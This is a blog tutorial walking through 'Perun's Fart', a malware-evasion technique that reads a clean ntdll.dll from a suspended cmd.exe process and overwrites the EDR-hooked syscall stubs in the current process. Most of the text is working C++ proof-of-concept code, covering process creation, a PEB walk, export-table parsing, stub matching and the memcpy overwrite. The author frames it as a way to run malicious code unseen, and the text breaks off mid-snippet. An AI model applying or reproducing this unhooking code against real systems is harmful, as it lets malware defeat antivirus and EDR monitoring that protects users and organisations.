API Unhooking with Perun's Fart

Pre-requisites

To fully understand this topic, one needs to have some knowledge about the following concepts:

A little C++ programming
Some knowledge of API hooking by AV/EDR software
Basic understanding of the PE structures
Basic knowledge about Win32 APIs and their workings

Introduction

Recently, while going through some malware evasion techniques, I came across a fairly new and uncommon technique called Perun’s Fart, described in a blog post by Sektor7. It focuses on retrieving a fresh, unhooked copy of ntdll.dll.

This is done by creating a process in a suspended state. At that point, the suspended process does not yet have any functions hooked by the EDR. According to the original blog, this takes advantage of the gap between a new process being spawned and the AV/EDR injecting its custom DLL. We will dive into this topic later on.

We then copy the syscall stubs from the fresh ntdll.dll into our current process, which gives us an unhooked version.

Overview of the technique

First we need to create a process in a suspended state
Then we need to find the base address of the ntdll.dll of our current process
Since Windows maps ntdll.dll at the same base address in every process of the same bitness until the next reboot, the base address of ntdll.dll in the suspended process will be the same as in ours
Therefore, we read the complete ntdll.dll from the suspended process
Then we parse the Export Directory of both the fresh ntdll.dll and that of our current process
We look for Nt APIs and extract the syscall stubs from fresh ntdll.dll and copy them to the ntdll of our current process
Then we can terminate the suspended process and continue with our malicious code. (Although, in this POC I have not used any injection code.)

Implementing the first part of the code

For this I will be using C++ as my language of choice, because I find it easier to work with some of the built-in structures and APIs. I will try to break down the technique into smaller parts and get into each detail. I have tried to add my own improvements on top of the C# code by packyhacker, which I believe is more faithful to the Windows Evasion Course by Sektor7.

Refer to my original POC : https://github.com/dosxuz/PerunsFart

Why suspended process?

To get a fresh copy of ntdll we need to create a suspended process as already stated. We need to read that ntdll.dll from the suspended process. But why is the ntdll in the suspended process not hooked? I got this answer to some extent from this StackOverflow thread.

According to this thread, only ntdll.dll is initially mapped, and an APC is queued to run when the thread resumes. This calls ntdll!LdrpInitializeProcess, which initializes the execution environment (e.g. language support, the heap, thread-local storage, the KnownDlls directory), loads kernel32.dll and gets the address of BaseThreadInitThunk, does static DLL imports, breaks for an attached debugger, and runs the init routines. Then execution jumps to ntdll!RtlUserThreadStart, which calls kernel32!BaseThreadInitThunk, which calls the EXE’s entry point such as WinMainCRTStartup

Therefore, when the process is started, only ntdll.dll is mapped at first. For this reason, if you attach to a suspended process using x64Dbg, you’ll find that only ntdll.dll is in the modules list.

Since the process is in a suspended state, the queued APC does not run either. LdrpInitializeProcess is therefore never called, and as a result the rest of the modules are not loaded.

As we can see in the above picture, only the ntdll.dll and the program itself are loaded.

NOTE: If you’re using a debugger like WinDbg, it will force the loading of other modules, as soon as you attach to the process

Reading fresh ntdll

Now that we know why we need a suspended process to get a fresh copy of the ntdll, we need to implement it.

First we need to create a process in a suspended state using the CreateProcessA API. We can do that as follows.
The following code is inside the main() function.

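// new T() zero-initialises both structures; cb must still hold the structure size
STARTUPINFOA* si = new STARTUPINFOA();
si->cb = sizeof(STARTUPINFOA);
PROCESS_INFORMATION* pi = new PROCESS_INFORMATION();
//BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"C:\\Windows\\System32\\svchost.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, si, pi);
// CREATE_SUSPENDED keeps the primary thread from running, so the loader never initialises the process
BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"cmd.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, nullptr, "C:\\Windows\\System32\\", si, pi);
if (!stat)
{
	printf("CreateProcessA failed : %lu\n", GetLastError());
	return 1;
}

HANDLE hProcess = pi->hProcess;
printf("PID : %lu\n", pi->dwProcessId);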

Finding the base address of ntdll.dll by traversing through the loaded modules in the process
For this, we use a custom function by paranoidninja. Here it is named as GetDll()

WCHAR findname[] = L"ntdll.dll\x00";
PVOID ntdllBase = GetDll(findname);
printf("ntdll.dll base address : 0x%p\n", ntdllBase);

We pass the name of the DLL whose base address we want to locate (in this case the ntdll.dll), and the function returns its base address.
The following is the code of GetDll() function

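PVOID GetDll(PWSTR FindName)
{
	// On x64 the gs segment addresses the TEB; offset 0x60 holds the PEB pointer
	_PPEB ppeb = (_PPEB)__readgsqword(0x60);
	PPEB_LDR_DATA pLdr = (PPEB_LDR_DATA)ppeb->pLdr;
	// The module list is circular, so remember the head to detect a full lap
	ULONG_PTR head = (ULONG_PTR)&pLdr->InMemoryOrderModuleList;
	ULONG_PTR val1 = (ULONG_PTR)pLdr->InMemoryOrderModuleList.Flink;

	while (val1 && val1 != head)
	{
		PWSTR DllName = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer;
		if (DllName && wcscmp(FindName, DllName) == 0)
		{
			return (PVOID)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase;
		}
		// Follow Flink to the next entry
		val1 = DEREF_64(val1);
	}
	// Module not found
	return nullptr;
}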

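The above function uses the intrinsic __readgsqword() to read a 64-bit value at offset 0x60 of the segment addressed by the gs register. On x64 Windows, gs points to the TEB (Thread Environment Block), and the value at offset 0x60 is the pointer to the PEB (Process Environment Block).
From the PEB structure, we find the address of the loader data, or Ldr.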

Then we traverse through the loaded modules using the Ldr in order to get our required base of the ntdll

Extracting Loaded Modules through the Loader Data

Before we move further, we need to understand the concept of how different modules are accessed and loaded in a process. For this, we will take help of WinDbg.

The Process Environment Block (PEB) has a Ldr structure at offset 0x018. We can view the structure of PEB using dt nt!_PEB

This Ldr is of type PEB_LDR_DATA. We can get the address of Ldr by using the command !peb

Now if we view the data at address 0x00007ffb38f1a4c0 as type PEB_LDR_DATA, we find the following

We see that there are 3 doubly linked lists: InLoadOrderModuleList, InMemoryOrderModuleList and InInitializationOrderModuleList. These are of type LIST_ENTRY, and each link in them is embedded in a structure of type LDR_DATA_TABLE_ENTRY.
Therefore, we can typecast the entries as LDR_DATA_TABLE_ENTRY

dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2ef0

Here we take the starting address of the InLoadOrderModuleList structure as the example.
Once we typecast it into LDR_DATA_TABLE_ENTRY, we will have the starting address of the next link.

We see that the first loaded module is the program itself cmd.exe
Now, we have the starting address of the next link 0x000002d2270d2d20, which we can use to typecast

dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2d20

We find that the next loaded module is ntdll.dll
Along with the name, we also get the base address.

This technique essentially reduces our dependency on the API GetModuleHandle, which in some cases might be hooked or blacklisted.
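The walk we just did by hand in WinDbg can be modelled without any Windows headers. The following is a minimal sketch, assuming simplified stand-in types (ListEntry, ModuleEntry) and helper names (EntryFromMemoryOrderLink, FindModuleBase) that are not part of the POC. It shows the two ideas that matter: a link is embedded inside its entry, so the entry is recovered by subtracting the member offset, and the list is circular, so the walk ends when it returns to the head.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cwchar>

// Simplified stand-ins for LIST_ENTRY and LDR_DATA_TABLE_ENTRY (hypothetical
// layouts for illustration; the real structures carry many more fields).
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

struct ModuleEntry {
    ListEntry      InLoadOrderLinks;
    ListEntry      InMemoryOrderLinks;
    void*          DllBase;
    const wchar_t* BaseDllName;
};

// Recover the owning ModuleEntry from a pointer to its InMemoryOrderLinks
// member, the same idea as the CONTAINING_RECORD macro.
inline ModuleEntry* EntryFromMemoryOrderLink(ListEntry* link) {
    auto* raw = reinterpret_cast<std::uint8_t*>(link);
    return reinterpret_cast<ModuleEntry*>(raw - offsetof(ModuleEntry, InMemoryOrderLinks));
}

// Walk the circular list starting after the sentinel head. Stopping when the
// walk reaches the head again means a missing module yields nullptr.
inline void* FindModuleBase(ListEntry* head, const wchar_t* name) {
    assert(head != nullptr && name != nullptr);
    for (ListEntry* cur = head->Flink; cur != head; cur = cur->Flink) {
        ModuleEntry* entry = EntryFromMemoryOrderLink(cur);
        if (entry->BaseDllName && std::wcscmp(entry->BaseDllName, name) == 0) {
            return entry->DllBase;
        }
    }
    return nullptr;
}
```

In a real process the head would be the InMemoryOrderModuleList member of PEB_LDR_DATA, and the entries would be the loader's own records rather than hand-built ones.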

Reading the entire ntdll with NtReadVirtualMemory

Now that we have the base address of the ntdll in our current process, we need to read the fresh copy. Windows maps ntdll.dll at the same base address in every process of the same bitness until the next reboot, so the ntdll in the suspended process sits at the same address. Therefore, we can use this same address to read from the suspended process.

Before reading from the suspended process, we need to know how many bytes we have to read.
We can get this from the SizeOfImage entry from the OptionalHeader structure.
We can parse the optional header as follows:

PIMAGE_DOS_HEADER ImgDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS ImgNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + (ImgDosHeader->e_lfanew));
IMAGE_OPTIONAL_HEADER OptHeader = (IMAGE_OPTIONAL_HEADER)ImgNTHeaders->OptionalHeader;
PIMAGE_SECTION_HEADER textsection = IMAGE_FIRST_SECTION(ImgNTHeaders);

DWORD ntdllSize = OptHeader.SizeOfImage;

First we typecast the base of ntdll to DOS Header structure
Next, we add the value of e_lfanew with the base of the image, in order to get the NT Headers
Once we have the NT Headers we can obtain the Optional Header from it
We also need the first section header, which we get from the NT Headers using the macro IMAGE_FIRST_SECTION(). The POC assumes that this first section is .text. It will be used later on.
Now that we have the size of ntdll image, we need to allocate memory of the same size using VirtualAlloc

LPVOID freshNtdll = VirtualAlloc(NULL, ntdllSize, MEM_COMMIT, PAGE_READWRITE);

Then we use NtReadVirtualMemory to read that same number of bytes from the suspended process, with the ntdll base address

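// NumberOfBytesRead is pointer-sized on x64, so the NtReadVirtualMemory_p typedef should declare PSIZE_T
SIZE_T bytesread = 0;
printf("Fresh NTDLL : 0x%p\n", freshNtdll);
NtReadVirtualMemory_p(hProcess, ntdllBase, freshNtdll, ntdllSize, &bytesread);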

Now we will have the fresh ntdll in the address freshNtdll
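To make the header arithmetic from this section concrete, here is a minimal sketch that does the same parsing on a plain byte buffer using only fixed PE offsets, so it needs no Windows headers. The names PeLayout, ReadU16, ReadU32 and ParsePeLayout are made up for this illustration. Unlike the POC, it looks the section up by its name ".text" instead of assuming it is the first one.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

struct PeLayout {
    std::uint32_t sizeOfImage = 0;  // OptionalHeader.SizeOfImage
    std::uint32_t textRva = 0;      // VirtualAddress of the ".text" section
    std::uint32_t textSize = 0;     // Misc.VirtualSize of the ".text" section
};

// Little-endian reads at a byte offset.
inline std::uint16_t ReadU16(const std::uint8_t* p, std::size_t off) {
    return static_cast<std::uint16_t>(p[off] | (p[off + 1] << 8));
}
inline std::uint32_t ReadU32(const std::uint8_t* p, std::size_t off) {
    return static_cast<std::uint32_t>(p[off]) |
           (static_cast<std::uint32_t>(p[off + 1]) << 8) |
           (static_cast<std::uint32_t>(p[off + 2]) << 16) |
           (static_cast<std::uint32_t>(p[off + 3]) << 24);
}

inline bool ParsePeLayout(const std::uint8_t* image, std::size_t size, PeLayout& out) {
    assert(image != nullptr);
    if (size < 0x40 || image[0] != 'M' || image[1] != 'Z') return false;  // DOS signature
    const std::size_t nt = ReadU32(image, 0x3C);                         // e_lfanew
    if (nt + 24 + 60 > size) return false;
    if (ReadU32(image, nt) != 0x00004550) return false;                  // "PE\0\0"
    // The file header follows the 4-byte signature.
    const std::uint16_t numberOfSections = ReadU16(image, nt + 4 + 2);
    const std::uint16_t optionalSize = ReadU16(image, nt + 4 + 16);
    // The optional header starts 24 bytes in; SizeOfImage sits at offset 56 of it.
    out.sizeOfImage = ReadU32(image, nt + 24 + 56);
    // This is the address IMAGE_FIRST_SECTION computes.
    const std::size_t firstSection = nt + 24 + optionalSize;
    for (std::uint16_t i = 0; i < numberOfSections; ++i) {
        const std::size_t sec = firstSection + static_cast<std::size_t>(i) * 40;
        if (sec + 40 > size) return false;
        if (std::memcmp(image + sec, ".text\0\0\0", 8) == 0) {
            out.textSize = ReadU32(image, sec + 8);   // Misc.VirtualSize
            out.textRva = ReadU32(image, sec + 12);   // VirtualAddress
            return true;
        }
    }
    return false;
}
```

Looking the section up by name costs a short loop, but it avoids depending on the section order of a particular ntdll build.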

Unhooking the current ntdll

We now need to extract the syscall stubs of the Nt functions from the fresh ntdll and write them over the Nt functions of the hooked ntdll.

This whole thing is done through the DoShit() function

DoShit(ntdllBase, freshNtdll, textsection);

It takes the parameters ntdllBase (the hooked ntdll in the current process), freshNtdll (the unhooked copy read from the suspended process) and textsection (the text section of the current ntdll)

Getting the Export Directory

The DoShit() function looks as follows

void DoShit(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_SECTION_HEADER textsection)
{
	// Export Directory of the fresh (unhooked) copy read from the suspended process
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(freshntDllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
	{
		printf("Error\n");
		return; // nothing to copy from
	}

	// Export Directory of the hooked ntdll mapped in the current process
	PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(ntdllBase, &hooked_pImageExportDirectory) || hooked_pImageExportDirectory == NULL)
	{
		printf("Error\n");
		return; // nothing to overwrite
	}

	OverwriteNtdll(ntdllBase, freshntDllBase, hooked_pImageExportDirectory, pImageExportDirectory, textsection);
}

The first function that we need to use is GetImageExportDirectory()
It takes the base address of ntdll (it takes both the hooked and unhooked versions in two different calls)
First we get the Export Directory of the fresh ntdll and then the Export Directory of the hooked ntdll
The GetImageExportDirectory works as follows :

BOOL GetImageExportDirectory(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
	//Get DOS header
	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return FALSE;
	}

	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)ntdllBase + pImageDosHeader->e_lfanew);
	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return FALSE;
	}
	// Get the EAT
	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ntdllBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
	return TRUE;
}

It first gets the pointer to the DOS Header from the image base
Then it gets the pointer to the NT Headers by adding the value of e_lfanew to the image base
From the Optional Header it takes the DataDirectory array and adds the VirtualAddress of the entry at index 0 to the image base
This is because the entry at index 0 (IMAGE_DIRECTORY_ENTRY_EXPORT) describes the Export Directory. We can confirm this from CFF Explorer

Therefore, we have the pointer to the export tables of both the hooked and unhooked versions of ntdll

Extracting addresses of Nt APIs

After getting the Export Directories of both the versions of DLLs, we call the OverwriteNtdll function
It takes the Export Directories of both the versions of ntdll

void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
		{
			PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
			if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
			{
				printf("Function Name : %s\n", pczFunctionName);
				printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
				//Change the write permissions of the .text section of the ntdll in memory
				DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
				//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
				std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
				//Change back to the old permissions
				ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
			}
		}
	}
	printf("Completed Overwriting ntdll.dll\n");
	getchar();
}

This function in turn calls the GetTableEntry() function (taken from HellsGate by am0nsec), which takes the base address of the ntdll, the Export Directory of that same version of the ntdll, and the name of the function whose address we want to extract.

PVOID GetTableEntry(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, CHAR* findfunction)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
	PVOID funcAddress = 0x00;
	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (std::strcmp(findfunction, pczFunctionName) == 0)
		{
			WORD cw = 0;
			while (TRUE)
			{
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
				{
					return 0x00;
				}

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
				{
					return 0x00;
				}

				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					WORD syscall = (high << 8) | low;
					//printf("Function Name : %s", pczFunctionName);
					//printf("Syscall : 0x%x", syscall);
					return pFunctionAddress;
					break;
				}
				cw++;
			}
		}
	}
	return funcAddress;
}

Although I have modified it to suit our current requirements, the core concept remains the same
This function first initializes the variables for storing the address of the functions, the address of the function names, and the address of Name Ordinals

PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);

It initializes the function address as 0x0

PVOID funcAddress = 0x00;

It then iterates through all the function names in the Export Directory, using pImageExportDirectory->NumberOfNames as the upper limit

for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
	PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
	PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

	if (std::strcmp(findfunction, pczFunctionName) == 0)
	{
		WORD cw = 0;
		while (TRUE)
		{
			if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
			{
				return 0x00;
			}

			// check if ret, in this case we are also probaly too far
			if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
			{
				return 0x00;
			}

			if (*((PBYTE)pFunctionAddress + cw) == 0x4c
				&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
				&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
				&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
				&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
				&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
				BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
				BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
				WORD syscall = (high << 8) | low;
				//printf("Function Name : %s", pczFunctionName);
				//printf("Syscall : 0x%x", syscall);
				return pFunctionAddress;
				break;
			}
			cw++;
		}
	}
}

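The outer for loop first calculates the address of the function name (as a char pointer) and the address of the function. The function address is found by using the name's index to look up an entry in the Name Ordinals table, and then using that entry as the index into the function address table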

PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
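The name to ordinal to function lookup done by these two lines can be tried out on a hand-built buffer. The following is a minimal sketch, assuming a memory-mapped image (so every RVA is a plain offset from the base) and made-up helper names (LoadU16, LoadU32, FindExportRva). The field offsets 24, 28, 32 and 36 are those of NumberOfNames, AddressOfFunctions, AddressOfNames and AddressOfNameOrdinals in IMAGE_EXPORT_DIRECTORY. It does no bounds checking, so it is only suitable for an image we trust.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Little-endian reads at a byte offset.
inline std::uint16_t LoadU16(const std::uint8_t* p, std::size_t off) {
    return static_cast<std::uint16_t>(p[off] | (p[off + 1] << 8));
}
inline std::uint32_t LoadU32(const std::uint8_t* p, std::size_t off) {
    return static_cast<std::uint32_t>(p[off]) |
           (static_cast<std::uint32_t>(p[off + 1]) << 8) |
           (static_cast<std::uint32_t>(p[off + 2]) << 16) |
           (static_cast<std::uint32_t>(p[off + 3]) << 24);
}

// Returns the RVA of the named export, or 0 when the name is not exported.
// exportDirRva corresponds to DataDirectory[0].VirtualAddress.
inline std::uint32_t FindExportRva(const std::uint8_t* image,
                                   std::uint32_t exportDirRva,
                                   const char* wanted) {
    assert(image != nullptr && wanted != nullptr);
    const std::uint8_t* dir = image + exportDirRva;
    const std::uint32_t numberOfNames = LoadU32(dir, 24);
    const std::uint32_t functionsRva  = LoadU32(dir, 28);
    const std::uint32_t namesRva      = LoadU32(dir, 32);
    const std::uint32_t ordinalsRva   = LoadU32(dir, 36);

    for (std::uint32_t i = 0; i < numberOfNames; ++i) {
        // AddressOfNames is an array of RVAs to NUL-terminated names.
        const char* name =
            reinterpret_cast<const char*>(image + LoadU32(image, namesRva + 4 * i));
        if (std::strcmp(name, wanted) != 0) continue;
        // The i-th name ordinal is the index into the function address array.
        const std::uint16_t index = LoadU16(image, ordinalsRva + 2 * i);
        return LoadU32(image, functionsRva + 4 * index);
    }
    return 0;
}
```

Adding the returned RVA to the image base gives the same pointer that pFunctionAddress holds in the POC.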

As soon as it finds the function name that we are looking for, it enters an inner while loop

if (std::strcmp(findfunction, pczFunctionName) == 0)
{
	WORD cw = 0;
	while (TRUE)
	{

Then we have the following code inside the while loop

if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
	return 0x00;
}

// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
	return 0x00;
}

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
	&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
	&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
	&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
	&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
	&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
	BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
	BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
	WORD syscall = (high << 8) | low;
	//printf("Function Name : %s", pczFunctionName);
	//printf("Syscall : 0x%x", syscall);
	return pFunctionAddress;
	break;
}
cw++;

In this code, the variable cw of type WORD is used as a byte offset from the function address
The first if statement checks whether the two bytes at the current offset are 0x0f and 0x05. These are the opcode bytes of the syscall instruction.

if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
	return 0x00;
}

The next if statement checks whether the current byte is 0xc3. In that case we have reached the ret instruction.

// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
	return 0x00;
}

In both cases we have gone past the start of the stub without recognising it, so this is treated as an error and the function returns 0x0
The third if statement checks that the four bytes at the current offset are 0x4c, 0x8b, 0xd1, 0xb8 (mov r10, rcx followed by the opcode of mov eax, imm32), and that the bytes at offsets 6 and 7 are 0x0. This means that we are exactly at the start of the syscall stub.

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
	&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
	&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
	&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
	&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
	&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
	BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
	BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
	WORD syscall = (high << 8) | low;
	//printf("Function Name : %s", pczFunctionName);
	//printf("Syscall : 0x%x", syscall);
	return pFunctionAddress;
	break;
}

From here we can either extract the syscall number (for other techniques like Hell’s Gate) or return the address of the function. The check is important to make sure that we have landed on the exact entry point of an Nt function.
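The byte pattern is easier to reason about when it is pulled out into a small function of its own. The following is a minimal sketch, not the POC code: the name ReadSyscallNumber and its signature are my own, and it only looks at the first 8 bytes instead of scanning forward.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Returns true and stores the syscall number when `stub` begins with
//   4C 8B D1          mov r10, rcx
//   B8 xx xx 00 00    mov eax, <syscall number>
// Returns false otherwise, for example when a hook replaced the prologue.
inline bool ReadSyscallNumber(const std::uint8_t* stub, std::size_t len,
                              std::uint16_t& number) {
    assert(stub != nullptr);
    if (len < 8) return false;
    const bool prologue = stub[0] == 0x4C && stub[1] == 0x8B &&
                          stub[2] == 0xD1 && stub[3] == 0xB8;
    const bool highBytesZero = stub[6] == 0x00 && stub[7] == 0x00;
    if (!prologue || !highBytesZero) return false;
    // The immediate is little-endian: low byte at offset 4, high byte at offset 5.
    number = static_cast<std::uint16_t>((stub[5] << 8) | stub[4]);
    return true;
}
```

For the bytes 4C 8B D1 B8 23 01 00 00 this yields the syscall number 0x0123, while a stub that starts with a jmp is rejected.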

Understanding the OverwriteNtdll function

Now that we know how the GetTableEntry function works, we can start with the OverwriteNtdll function.

void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
		{
			PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
			if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
			{
				printf("Function Name : %s\n", pczFunctionName);
				printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
				//Change the write permissions of the .text section of the ntdll in memory
				DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
				//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
				std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
				//Change back to the old permissions
				ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
			}
		}
	}
	printf("Completed Overwriting ntdll.dll\n");
	getchar();
}

This function walks the export table in the same way as GetTableEntry, but instead of checking for the syscall stub, it checks whether the function name contains "Nt".

if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
	PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
	if (funcAddress != 0x00)
	{
		printf("Function Name : %s\n", pczFunctionName);
		printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
		//Change the write permissions of the .text section of the ntdll in memory
		DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
		//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
		std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
		//Change back to the old permissions
